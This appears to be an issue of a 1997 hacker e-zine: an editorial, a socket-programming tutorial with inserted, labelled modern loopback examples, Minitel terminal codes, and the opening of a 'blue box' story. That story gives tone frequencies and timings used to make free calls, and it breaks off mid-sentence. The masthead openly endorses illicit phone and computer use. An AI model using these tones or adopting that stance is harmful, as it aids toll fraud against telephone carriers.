
The Havoc Technical Journal 10

  

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The HAVOC Technical Journal ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±

Vol. 1 | No.10 | May 1st, 1997 | A HAVOC Bell Systems Publication
"Will someone please ICMP 127.0.0.1? That guy is an asshole!" -iCBM
_____________________________________________________________________________

-[The HAVOC Technical Journal Issue 10]-
Editorial..............................Scud-O
Network Programming for the Beginner...Scud-O
A Blue Box Story.......................memor
Basic Electricity......................ec|ipse
Pirating Your Own Radio Station........DataThief
French Pager Annoying..................memor
Unix Port Prober - prober.c............Scud-O
udp-scan.c [ from Satan 1.1.1 ]........Wietse Venema
phf.c (Again)..........................Scud-O/memor/[others]
The history of digital technology......REality
Scanning for losers....................shamr0ck
REality's Digital Dictionary...........REality
K-Kool hackers chat here!..............KungFuFox
The News...............................KungFuFox
Phonecalls.............................THTJ

-------------------------------------------------
PLEASE NOTE: HBS's and THTJ's Web site is moving! Take note as Scud-O
will be replacing his page with his own shit and code soon!

The new site is still under wraps, stay tuned to thtj for more info,
and look at the current geocities web site, which will lead you to the new
site.

_____________________________________________________________

Each pushes a weight against his chest, and howls
At his opponent each time that they clash:
"Why do you squander?" and "Why do you hoard?"

Each wheels To roll his weight back round again; they rush
Toward the circle's opposite point, collide
Painfully once more, and curse each other afresh...

The Inferno of Dante, Canto VII

[ Subliminal Message: Get Inferno OS NOW! http://www.lucent.com/inferno/ ]
_____________________________________________________________

The HAVOC Technical Journal - Information
- Editor in Chief : Scud-O, FoxMulder@worldnet.att.net
- Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@juno.com
- THTJ website: http://www.geocities.com/SiliconValley/8805
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784

The HAVOC Technical Journal Vol. 1, No.10, May 1st, 1997.
A HAVOC Bell Systems Publication. Contents Copyright (©)
1997 HAVOC Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of HAVOC
Bell Systems Publishing. [No copying THTJ, damnit.]

The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]


For information about using articles published in THTJ, send mail to:
e-mail: thtj@juno.com
mail: THTJ
c/o HBS
PO Box 448
Sykesville, MD 21784
_____________________________________________________________
[Editorial : by Scud-O]

Ok, I had a great editorial all written up, but some things have
been going on, and I do not want to offend people, so I killed what I had
written up. So naturally there is no editorial. Sorry.

Hey, anyway, check out the new HBS site. I was bored with the old one
so I bombed it, and made a whole new site. And don't worry, the 'After the
Aftermath' doesn't mean that HBS or THTJ is going to die, we are stronger
than ever, so don't worry.

I would like to send thanks out to KungFuFox, not only for editing
THTJ 9, but for majorly helping me out with THTJ. I owe you big Kung!

Also, thanks go to JP, who has risen AntiOnline from a new site on
a terribly slow connection, and a huge URL, to one of the largest hacking
sites on the web, and its own domain. Keep it coming JP! And JP, I owe you
too, thanks for your kind, witty advice, and for making a kick ass site, so
I felt bad about my site, and fixed it up, majorly.

And finally, wrath.sepulchre.org is gone. This is upsetting to me
since I was planning on moving my site, but thanks to too many lamers that
abused BitchX, wrath was K-Lined, and well after getting too many complaints
from sysadmins, chiapope pulled the plug. So, thanks a hell of a lot to you
lamers that made chia do this. ( You know who you are..... buncha punks...)

[ AntiOnline: http://www.antionline.com ]
[ RIP : wrath.sepulchre.org ]

----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-

FoxMulder@worldnet.att.net | http://www.geocities.com/SiliconValley/8805

(Hey, I'm left handed, so if ya don't like the quote, fuck you! )
"Any group that includes Charlemagne, Rock Hudson, Paul McCartney,
Leonardo da Vinci, Benjamin Franklin, Jack the Ripper, and the
Boston Strangler must be select, if not elite."

-author James de Kay talking about left handers

The Truth May Be Out There (Call Me If You Find It)
_____________________________________________________________
[Network Programming for the Beginner]
A Tutorial by Scud-O

Network programming is the heart of UNIX programming. It is as simple
as that. (Well, ok not all programs need to communicate via a network, or
modem, but network programming is still none the less an important part of
UNIX.) And since this important topic can be so complex and complicated, I
decided to write this primer on sockets and socket programming. Now this
article is anything but complete and in-depth, since this is only to give you
the basics. With this you can start writing various utilities and firewall
holes, whatever, but if you really want to know more, go out and buy the 3
volume set of books: TCP/IP Illustrated from Addison-Wesley Publishing.
Although I currently do not have this 3 volume set, ( hell, I'm too busy
saving up for my new car and a new hard drive!) I always stop by Borders and
spend a few hours reading it, or stealing my friend's copy for a few days.

Ok, anyway, there are a few basic calls and protocols that you will
use for the connection.

o socket()
o bind()
o listen()
o accept()
o setsockopt()
o getsockopt()
o connect()
o sendto()
o recvfrom()

You must also decide which type of protocol you will use:
o Connection Based (TCP)
o Connectionless (UDP)

[Ports and Sockets]

Network Programming is based on the use of sockets to accept and send
information. As I showed above, there are 2 main protocols that you can use
to send information. Transmission Control Protocol ( TCP ) and User Datagram
Protocol ( UDP ) are your 2 choices. TCP is a connection based protocol,
which means that when you open up a port you send a 3 way handshake, and
usually login with a user id and password. UDP is a connectionless protocol,
which means that no login is made, and a handshake is not done, so
connections can be easily lost, and errors are common, however this is an
easier protocol to implement (or so I think). Basically, the main difference
is that with TCP a connection is set up first, while in UDP, data is
exchanged as part of the message. Both protocols require you to have a port
number which you open up to, to transfer information. Numbers are used so a
computer doesn't have to 'read' what applications are running ( why do you
think UNIX uses pids? ). It also makes it easy for the os to know how many
applications are running at any given time.
Technically, the port numbers could be assigned by the system
administrator, but for the most part ( about 99% ) servers use some standard
conventions for assigning ports so machines can communicate. Port numbers are
assigned from 1 and go on up. For the most part ports above 255 are for the
local system's use only, but as with everything, there are exceptions ( irc at
port 6667 or httpd at 8080 for example ). The ports from 1 to 255 are for
most networking services.
Each network connection ( both going into and out of ) a host's port
is uniquely identified by a combination of 2 numbers, the ip address of the
machine and the port number in use, which together make up a socket.
Because at least 2 computers will be involved with the connection,
there are sockets on both the sending and receiving ends of the connection.
And since both the ip addresses and the ports are unique to each machine, the
sockets are thus unique, and this lets applications talk to each other across
the network based entirely on the socket number.
Both machines on the connection maintain port lists that list all
active ports, and the 2 machines involved have reversed entries for each
session between the two, a process called binding. For example, if one
machine has a source port at 23 and the destination at 25, the other machine
will have a source port at 25 and a destination at 23.

[Socket Programming]
Linux supports BSD style socket programming, so everything here
should work on either Linux or any of the BSD platforms.

Well, once again, here is the list of the main socket C functions you
will be using.
o socket()
o bind()
o listen()
o accept()
o setsockopt()
o getsockopt()
o connect()
o sendto()
o recvfrom()

[ The socket() System Call ]
The socket() system call creates a socket for the client or the
server.
The socket() function is defined as:

#include <sys/types.h>
#include <sys/socket.h>

int socket(int family, int type, int protocol);

For linux, the family equals AF_UNIX. The type would be either
SOCK_STREAM ( socket stream: slow, reliable connection) or SOCK_DGRAM
( socket datagram: fast, less reliable connection). The protocol should
be IPPROTO_TCP for SOCK_STREAM and IPPROTO_UDP for SOCK_DGRAM.

The return value from this function is -1 if an error occurred,
otherwise it is a socket descriptor. You use the socket descriptor to refer
to this socket in all calls in your program after a successful socket() .

Sockets are created without names, since bind() is used by the
clients to read or write to a socket.

[ The bind() System Call ]

The bind() call assigns a name to an unnamed socket. Bind is
defined as:

#include <sys/types.h>
#include <sys/socket.h>

int bind(int sockfd, const struct sockaddr *saddr, socklen_t addrlen);

The first item is a socket descriptor, the second is a structure
holding the name to use, and the last item is the structure's size.

Now that you have bound an address for your client or server, you can
either connect() to it (if your code is a client) , or listen() to it, (if
your code is a server). First i'll show you listen() and a few other calls
that servers use, and then we will get to clients.

[ The listen() System Call ]

The listen() system call is used by the server. It is defined as:

#include <sys/types.h>
#include <sys/socket.h>

int listen(int sockfd, int backlog);

The sockfd is the socket descriptor, and the backlog is that
wonderful little backlog queue that daemon9 showed us how to exploit in
phrack 48. It holds the number of pending connections before any are
rejected. Use the standard value of 5 for this. A return value of less than 1
is an error.

If this call is successful, you can now accept connections.

[ The accept() System Call ]

accept() is used by a server to accept any incoming messages from
a client's connect() call. Be aware that this function does not return if no
connections are received. It is defined as:

#include <sys/types.h>
#include <sys/socket.h>

int accept(int sockfd, struct sockaddr *peeraddr, socklen_t *addrlen);

The parameters are the same as for the bind() call, except that peeraddr
points to information about the client that is making the connection request
and addrlen is a pointer to the length, which you set to the size of peeraddr
before the call. Based upon the incoming message, the fields in peeraddr are
filled out.

[ The connect() System Call ]
connect() is used by a client program to connect to a server when you
are using a connection-based system (ie, TCP). This call should be made after
you have bind()ed the connection. It is defined as:

#include <sys/types.h>
#include <sys/socket.h>

int connect(int sockfd, const struct sockaddr *servaddr, socklen_t addrlen);

As you can see, the parameters are the same as those for the bind
call except that servaddr points to info about the server that the client
is connecting to. The accept() call creates a new socket for the server to
work with the request. This way, the server can fork() off a new process and
wait for more connections.

[ setsockopt(), getsockopt(), and the Linux bug ]
You may not know this, but there is a major bug in Linux's socket
libraries. The bug is that even if you have closed a socket properly, you
cannot reuse that socket. ( I think daemon9 discussed this in his TCP/SYN
article for phrack 48, and I think that his ideas on what was causing the
problem are right, but that remains to be seen. ) For example, if you write
a server that waits on a socket, it opens the socket and listens on it without
a single problem. However, if the server either crashes or normally
terminates and you restart the server, you can not bind back to the same
port. The error codes from bind() keep returning an error indicating that the
port you are trying to connect on is already bound by another process.
The problem lies in the fact that Linux's kernel never marks ports as
unused when the process that is using the socket terminates.

To get around this, the solution is to use setsockopt() to set the
options on the socket when it is opened, and before a connection is made. The
setsockopt() sets options and the getsockopt() call gets options for a given
socket.

The syntax and definition of the 2 calls are:

#include <sys/types.h>
#include <sys/socket.h>

int setsockopt(int sockfd, int level, int name, const void *value,
               socklen_t optlen);
int getsockopt(int sockfd, int level, int name, void *value,
               socklen_t *optlen);

Once again, the sockfd must be an open socket, level is the protocol
level, either IPPROTO_TCP for TCP/IP or SOL_SOCKET for socket level options.
Name is the option as defined in the socket's man page. The *value pointer
points to the location where a value is set by getsockopt() and must be set
by you when calling setsockopt().
The full man page for this is under man page setsockopt(2). Have fun
reading it.
Now, back to the bug. When you open a socket, you must also call the
setsockopt() function like so:

#ifdef LINUX
opt = 1; len = sizeof(opt);
/* setsockopt() takes the option length by value, not by pointer */
setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, len);
#endif

You will only need the #ifdef and #endif if you want to be able to
quickly and easily port this code, since some UNIX systems don't support the
SO_REUSEADDR flag.
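
The restart problem and its fix, reproduced on the loopback interface as an added example (not code from the original article; every function name is hypothetical). The server closes its side of a connection first, which leaves that connection in TCP's TIME_WAIT state still holding the port, and the second bind() only succeeds when both server runs set SO_REUSEADDR.

```c
/* Added example (not from the article): bind() after a server restart,
 * with and without SO_REUSEADDR. Loopback only; all names are hypothetical. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* TCP socket bound to 127.0.0.1:port (port 0 = kernel picks one).
 * Returns the descriptor, or -1 with errno left by the failing call. */
static int bound_socket(unsigned short port, int reuse)
{
    struct sockaddr_in a;
    int opt = 1, saved;
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    if (fd < 0) return -1;
    memset(&a, 0, sizeof(a));
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    a.sin_port = htons(port);
    if ((reuse && setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0) ||
        bind(fd, (struct sockaddr *)&a, sizeof(a)) < 0) {
        saved = errno;          /* close() may overwrite errno */
        close(fd);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Run one server "lifetime", then try to bind the same port again.
 * Returns 0 if the second bind() worked, the errno it failed with
 * otherwise, or -1 if the setup itself failed. */
int restart_bind_result(int reuse)
{
    struct sockaddr_in a;
    socklen_t len = sizeof(a);
    char c;
    int lfd, cfd, afd, rfd, result;

    lfd = bound_socket(0, reuse);
    if (lfd < 0 || listen(lfd, 5) < 0) return -1;
    if (getsockname(lfd, (struct sockaddr *)&a, &len) < 0) return -1;

    cfd = socket(AF_INET, SOCK_STREAM, 0);
    if (cfd < 0 || connect(cfd, (struct sockaddr *)&a, sizeof(a)) < 0) return -1;
    afd = accept(lfd, NULL, NULL);
    if (afd < 0) return -1;

    /* The server closes first, so its end of the connection lingers */
    close(afd);
    close(lfd);
    while (read(cfd, &c, 1) > 0)
        ;                       /* client waits for EOF ... */
    close(cfd);                 /* ... then finishes the close */

    /* "Restart": same address, same port */
    rfd = bound_socket(ntohs(a.sin_port), reuse);
    result = (rfd < 0) ? errno : 0;
    if (rfd >= 0) close(rfd);
    return result;
}

static const char *describe(int r)
{
    return r == 0 ? "bind ok" : r < 0 ? "setup failed" : strerror(r);
}

int main(void)
{
    printf("without SO_REUSEADDR: %s\n", describe(restart_bind_result(0)));
    printf("with    SO_REUSEADDR: %s\n", describe(restart_bind_result(1)));
    return 0;
}
```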


[ Sample Code: A Socket Oriented Server ]

/********************************************************
 * Sample Code: A Socket Oriented Server, from THTJ 10
 * Written By Scud-O of HBS
 ********************************************************/


#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 1152 /* Use what ever you want, it doesn't matter */

void myabort(const char *msg);  /* you write these two, see the NOTE below */
void do_what_ever_here(int fd);

int main(int argc, char *argv[])
{
    int sockfd, newfd;
    int cpid; /* child id */
    int opt;
    socklen_t len;
    struct sockaddr_in servaddr;
    struct sockaddr_in client_info;

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        myabort("Unable to create socket");
    }

#ifdef LINUX
    opt = 1; len = sizeof(opt);
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, len);
#endif

    bzero((char *)&servaddr, sizeof(servaddr));

    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
    servaddr.sin_port = htons(PORT);

    /******************
     * the htonl ( for a long integer ) and htons ( for short integer ) convert
     * a host oriented byte order into a network order.
     *******************/


    if (bind(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0)
    {
        myabort("Unable to bind socket");
    }

    listen(sockfd, 5);
    for (;;)
    {
        /* Wait here.... */
        len = sizeof(client_info); /* accept() wants a pointer to the length */
        newfd = accept(sockfd, (struct sockaddr *)&client_info, &len);
        if (newfd < 0)
            myabort("Unable to accept on socket");
        if ((cpid = fork()) < 0)
            myabort("Unable to fork on accept");
        else if (cpid == 0)
        {
            /* Child Process */
            close(sockfd); /* We dont need the original anymore */

            /* Place your code for what you want the server to do where
               do_what_ever_here(newfd); is ! */

            do_what_ever_here(newfd);

            exit(0);
        }
        close(newfd); /* were back in the parent */

    } /* end of for loop */

    /* Good Bye! */
}

Ok, so basically, the connection based server does the following things:

o Creates a socket with socket()
o Binds itself to an address with bind()
o Listens for connections with listen()
o Accepts any incoming connections with accept()
o Gets incoming messages with read() and writes with write()
[ read() and write() will be in your do_what_ever_here() call! ]

NOTE: myabort() should be a procedure YOU create to handle error messages,
and then kill the process, restart, etc.

Now, for a client.....
[ The Client ]

/********************************************************
 * Sample Code: A Socket Oriented Client, from THTJ 10
 * Written By Scud-O of HBS
 ********************************************************/


#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 1152 /* Use what ever you want, it doesn't matter */
#define MY_HOST_ADDR "Put.Your.IP.Here"

int getServerSocketId()
{
    int fd, opt;
    socklen_t len;
    struct sockaddr_in unix_addr;

    /* Create an Internet domain stream socket */
    if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        return(-1);
    }
#ifdef LINUX
    opt = 1; len = sizeof(opt);
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &opt, len);
#endif

    /* Fill socket address structure with our address */
    memset(&unix_addr, 0, sizeof(unix_addr));
    unix_addr.sin_family = AF_INET;

    /* Convert internet address to binary value */
    unix_addr.sin_addr.s_addr = inet_addr(MY_HOST_ADDR);
    unix_addr.sin_port = htons(0); /* local port: let the kernel pick one */
    len = sizeof(unix_addr);

    if (bind(fd, (struct sockaddr *) &unix_addr, len) < 0)
    {
        close(fd);
        return(-2);
    }

    /* Now fill the structure with the server's address (assumed here
       to be listening on MY_HOST_ADDR as well) and connect to it */
    memset(&unix_addr, 0, sizeof(unix_addr));
    unix_addr.sin_family = AF_INET;
    unix_addr.sin_addr.s_addr = inet_addr(MY_HOST_ADDR);
    unix_addr.sin_port = htons(PORT);
    if (connect(fd, (struct sockaddr *) &unix_addr, len) < 0)
    {
        close(fd);
        return(-3);
    }

    return(fd);
}

/* Add in main() function, do whatever you like to send out
   error messages, etc..... */


The client does the following things:

o Creates a socket with socket()
o Attempts to connect with connect()
o If a connection is made, request data with write(), read info with
read() [ NOTE: these would be called in main() ]

Now, for a connectionless socket example

[ Connectionless Sockets : The Server ]

Ok, first we will need to know the few subtle but important
differences with connectionless socket programming. The first main principle
is that the server uses recvfrom() instead of listen() and accept(). And, to
reply to messages, sendto() is used.

#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 262 /* Use what you wish */
#define MAXM 4096
char mesg[MAXM];

void myabort(const char *msg);      /* you write these two */
void do_what_ever_here(char *mesg);

int main(int argc, char *argv[])
{
    int sockfd;
    int n;   /* bytes received */
    int opt;
    socklen_t len;
    struct sockaddr_in servaddr;
    struct sockaddr_in client_info;

    /* SOCK_DGRAM, since this is the connectionless (UDP) server */
    if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
    {
        myabort("Unable to create socket");
    }

#ifdef LINUX
    opt = 1; len = sizeof(opt);
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, len);
#endif

    bzero((char *)&servaddr, sizeof(servaddr));

    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
    servaddr.sin_port = htons(PORT);

    /******************
     * the htonl ( for a long integer ) and htons ( for short integer ) convert
     * a host oriented byte order into a network order.
     *******************/


    if (bind(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0)
    {
        myabort("Unable to bind socket");
    }

    for (;;)
    {
        /* Wait here.... */
        len = sizeof(client_info); /* recvfrom() wants a pointer to the length */
        n = recvfrom(sockfd, mesg, MAXM, 0, (struct sockaddr *)&client_info,
                     &len);
        if (n < 0)
            continue; /* receive error, wait for the next message */

        /* Place what server is to do in here. */
        do_what_ever_here(mesg);

        sendto(sockfd, mesg, n, 0, (struct sockaddr *)&client_info, len);
    } /* end of for loop */
    /* Good bye! */
}

As you can see, connectionless programming is much easier than connection
based programming, but I still advise against using connectionless, since
errors are very common. And, a pain lies in that you must process each
message one at a time, since messages from multiple clients can be
multiplexed together. In the connection based model, the child process always
knows where each message is coming from.

The client doesn't need to call the connect() call either, instead
it calls sendto() directly. For a client side of the connectionless
connection, use the same code as in the server, but note that sendto() is
called before recvfrom(), as so:

#include <sys/types.h>
#include <sys/socket.h>

ssize_t sendto(int sockfd, const void *message, /* pointer to message */
               size_t length,                    /* of message */
               int flags,                        /* of routing, leave as 0 */
               const struct sockaddr *client,    /* where to send it */
               socklen_t addrlen);               /* of sockaddr */

NOTE: Use this call, not sendmsg(), since sendto() is more efficient

Any errors are returned as -1, and only local errors will be
detected.

recvfrom() looks like:

#include <sys/types.h>
#include <sys/socket.h>

ssize_t recvfrom(int sockfd, void *message,      /* buffer for the message */
                 size_t length,                   /* of buffer */
                 int flags,                       /* of routing, leave as 0 */
                 struct sockaddr *client,         /* filled in with the sender */
                 socklen_t *addrlen);             /* pointer to size of sockaddr */

Note that if the message is too long to fit in the buffers, the
extra bytes will be discarded. The call could return immediately, or it could
wait forever, it all depends on the type of flag that is sent. I also
recommend that you set timeout values, read the man page for recvfrom, since
this info changes from server to server.
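
The two recvfrom() points above, discarded extra bytes and calls that can wait forever, shown as an added example on the loopback interface (not code from the original article; all names are hypothetical). It uses recvmsg() so the truncation is reported instead of passing silently, and SO_RCVTIMEO as one way to set the timeout.

```c
/* Added example (not from the article): a UDP receive that is bounded,
 * timed, and reports truncation. Loopback only; all names are hypothetical. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <netinet/in.h>

struct udp_demo {
    long stored;     /* bytes kept from the oversize datagram */
    int  truncated;  /* 1 if the kernel discarded the rest of it */
    int  sender_ok;  /* 1 if the reported sender is our client socket */
    long fit_len;    /* bytes kept from a datagram that fits */
    int  timed_out;  /* 1 if an idle receive gave up instead of hanging */
};

/* UDP socket bound to 127.0.0.1 on a kernel-chosen port, with a receive
 * timeout. *self is filled in with the address actually bound. */
static int udp_socket(struct sockaddr_in *self, int timeout_ms)
{
    socklen_t len = sizeof(*self);
    struct timeval tv = { .tv_sec = timeout_ms / 1000,
                          .tv_usec = (timeout_ms % 1000) * 1000 };
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0) return -1;
    memset(self, 0, sizeof(*self));
    self->sin_family = AF_INET;
    self->sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)) < 0 ||
        bind(fd, (struct sockaddr *)self, sizeof(*self)) < 0 ||
        getsockname(fd, (struct sockaddr *)self, &len) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Receive one datagram. Returns the bytes stored in buf, or -1 on error or
 * timeout. recvmsg() is used because it reports MSG_TRUNC in msg_flags. */
static long recv_checked(int fd, void *buf, size_t cap,
                         struct sockaddr_in *from, int *truncated)
{
    struct iovec iov = { .iov_base = buf, .iov_len = cap };
    struct msghdr msg;
    long n;
    memset(&msg, 0, sizeof(msg));
    msg.msg_name = from;
    msg.msg_namelen = sizeof(*from);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    n = (long)recvmsg(fd, &msg, 0);
    if (n >= 0) *truncated = (msg.msg_flags & MSG_TRUNC) != 0;
    return n;
}

int run_udp_demo(struct udp_demo *r)
{
    struct sockaddr_in srv, cli, from;
    struct sockaddr *to = (struct sockaddr *)&srv;
    char big[64], small[16];
    int s, c, trunc = 0, rc = -1;
    memset(r, 0, sizeof(*r));
    memset(&from, 0, sizeof(from));
    s = udp_socket(&srv, 200);
    c = udp_socket(&cli, 200);
    if (s < 0 || c < 0) goto done;

    /* 64 bytes sent, 16-byte buffer: the extra bytes are discarded */
    memset(big, 'A', sizeof(big));
    if (sendto(c, big, sizeof(big), 0, to, sizeof(srv)) < 0) goto done;
    r->stored = recv_checked(s, small, sizeof(small), &from, &trunc);
    r->truncated = trunc;
    /* The source address is only what the packet claims; UDP does not verify it */
    r->sender_ok = from.sin_port == cli.sin_port &&
                   from.sin_addr.s_addr == cli.sin_addr.s_addr;

    /* A datagram that fits arrives whole */
    if (sendto(c, "ping", 4, 0, to, sizeof(srv)) < 0) goto done;
    r->fit_len = recv_checked(s, small, sizeof(small), &from, &trunc);

    /* Nothing queued: SO_RCVTIMEO ends the wait after 200 ms */
    r->timed_out = recv_checked(s, small, sizeof(small), &from, &trunc) < 0 &&
                   (errno == EAGAIN || errno == EWOULDBLOCK);
    rc = 0;
done:
    if (s >= 0) close(s);
    if (c >= 0) close(c);
    return rc;
}

int main(void)
{
    struct udp_demo r;
    int rc = run_udp_demo(&r);
    printf("rc=%d stored=%ld truncated=%d sender_ok=%d fit=%ld timed_out=%d\n",
           rc, r.stored, r.truncated, r.sender_ok, r.fit_len, r.timed_out);
    return rc ? 1 : 0;
}
```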

Ok, well, this is all for this beginner's primer on Socket Programming. I have
barely even started to get to the core of socket programming, but one can
only devote so much time to a subject. For more information, check out the
book : 'UNIX Network Programming' by W. Richard Stevens ( Prentice Hall,
1990) this is by far the most comprehensive guide out there, and most
Universities use it for a text book for their advanced C classes.

_____________________________________________________________
[A Blue Box Story]
by memor

Israel blueboxing was born because we found a Teletel gate that we could
access via a local Israel number.

**************************
*Remember Teletel Network*
**************************

It is a V23 interface (1200/75 baud, which you can access with a USR Sportster
by changing the S38 register with ATS38=4&w &w for saving changes).
It runs on Videotex terminals. There are many kinds of these terminals;
the first one, made by France Telecom, is named "Minitel" and is like a
modem + console. The modem is a CAP23 (1200/75 baud remote, up to 9600 baud
local) and the console is Videotex (40 column mode or 80 column mode). The
40 column mode is the most used because it is a graphical mode and 80 column
is only a text mode.
You activate graphics mode in 40 columns by sending $0e (Control + N). After
that you calculate the graphic you send as a character with this method:

*********
*$01*$02*   example: if you want to make this graphic :   ▓
*********                                                  ▓▓
*$04*$08*                                                  ▓
*********
*$10*$40*   You will have to light up $01,$04,$10 and $08 with this
*********   algorithm : $20 + $01 + $04 + $08 + $10 = $3D
So you'll have to send to the local console a $0E , $3D.
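
The cell arithmetic above as an added example (not part of the original article): a small encoder that turns a three-row bitmap into the bytes to send, $0E followed by one mosaic character per two-pixel-wide cell. The function names and the '#'/'.' bitmap notation are hypothetical, and the sample bitmap in main() is constructed from the article's own glyph.

```c
/* Added example (not from the article): encoder for the 2x3 mosaic cells
 * described above. Names and the '#'/'.' notation are hypothetical. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MINITEL_GRAPHICS_ON 0x0E   /* Control + N */

/* Weight of each cell, laid out as in the article's diagram */
static const unsigned char CELL_WEIGHT[3][2] = {
    { 0x01, 0x02 },
    { 0x04, 0x08 },
    { 0x10, 0x40 },
};

/* Encode the 2x3 block whose top-left pixel is column `left` of a
 * three-row bitmap. Pixels past the end of a row count as unlit. */
unsigned char mosaic_cell(const char *rows[3], size_t left)
{
    unsigned char code = 0x20;     /* base value from the article */
    size_t r, c;

    for (r = 0; r < 3; r++) {
        size_t width = strlen(rows[r]);
        for (c = 0; c < 2; c++) {
            if (left + c < width && rows[r][left + c] == '#')
                code += CELL_WEIGHT[r][c];
        }
    }
    return code;
}

/* Encode a whole three-row bitmap: 0x0E, then one byte per cell.
 * Returns the number of bytes written, or 0 if `out` is too small. */
size_t mosaic_line(const char *rows[3], unsigned char *out, size_t cap)
{
    size_t width = 0, cells, i, r;

    for (r = 0; r < 3; r++)
        if (strlen(rows[r]) > width)
            width = strlen(rows[r]);
    cells = (width + 1) / 2;       /* an odd last column gets its own cell */
    if (cap < cells + 1)
        return 0;
    out[0] = MINITEL_GRAPHICS_ON;
    for (i = 0; i < cells; i++)
        out[i + 1] = mosaic_cell(rows, 2 * i);
    return cells + 1;
}

int main(void)
{
    /* Constructed sample: the article's glyph, lit cells $01,$04,$08,$10 */
    const char *glyph[3] = { "#.", "##", "#." };
    unsigned char buf[8];
    size_t i, n = mosaic_line(glyph, buf, sizeof(buf));

    for (i = 0; i < n; i++)
        printf("$%02X ", buf[i]);
    printf("\n");
    return 0;
}
```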

Colors (or gray scale if the Minitel console is monochrome) of the Minitel
are accessible with these commands sent to the local console:

Text Color:
***********

ESC @ - BLACK -
ESC D - DARK BLUE -
ESC A - RED -
ESC E - PURPLE -
ESC B - GREEN -
ESC F - LIGHT BLUE-
ESC C - YELLOW -
ESC G - WHITE -

Background Color:
*****************

ESC P - BLACK -
ESC T - DARK BLUE -
ESC Q - RED -
ESC U - PURPLE -
ESC R - GREEN -
ESC V - LIGHT BLUE-
ESC S - YELLOW -
ESC W - WHITE -

You can use some effects on a videotex terminal, like these:

Effect:
*******

ESC Z : underlining
ESC Y : Stop Underlining
ESC ] : Inverse Video Mode
ESC \ : Normal Video Mode
CONTROL + N : Graphism Mode
CONTROL + O : Text Mode
ESC H : Flash On
ESC I : Flash Off

Normally on a BBS (v32, v34...), file transfers are done with Zmodem, Ymodem,
Xmodem or Kermit. On a Teletel terminal or videotex RTC (switched
telephone network, little 1200/75 V23 BBSes) they are done with the BBT
protocol, a really slow and bad one (the BBT protocol is free on
ftp.teaser.fr or ftp.minitel.fr, recently hacked with some libroot.gz,
unreachable)

Little Videotex RTC answer output example:

/* Minitel send a carrier on a "RING" */

atz<cr> /* Software Reset*/
OK
ats34=8<cr> /*Configuring modem for V23*/
OK
*** executing answer script
RING
RING /*Answer after 2 rings because S00
sportster register S00=02*/

ata<cr> /*Send a carrier*/
CONNECT 1200/75 /*Connected to Cap23 or Minitel*/
*** connected
*** run c:\usr\minitel\minitel.exe

For more information about Teletel networks, email
(France Telecom main server administrator) root@ftp.minitel.fr
(A really known Teletel programmer and Graphist) chip@mail.teaser.fr
(A videotex Graphist) darkseed@avo.net

***********************
*Back To Bluebox Story*
***********************

So, just like I said before, some phreaker friends and I were trying
to bluebox on ISRAEL to call that Teletel gate for free (Israel allows
only local dials with blueboxing). The frequencies (MF) were:

Frequency 1: F1: 2650
             F2: 2250
         Length: 175ms

          Delay: 10ms

Frequency 2: F1: 2420
             F2: 2400
         Length: 345ms

          Delay: 10ms

And the dial was AxxxxxxxxC, A for local call. B hung up directly after
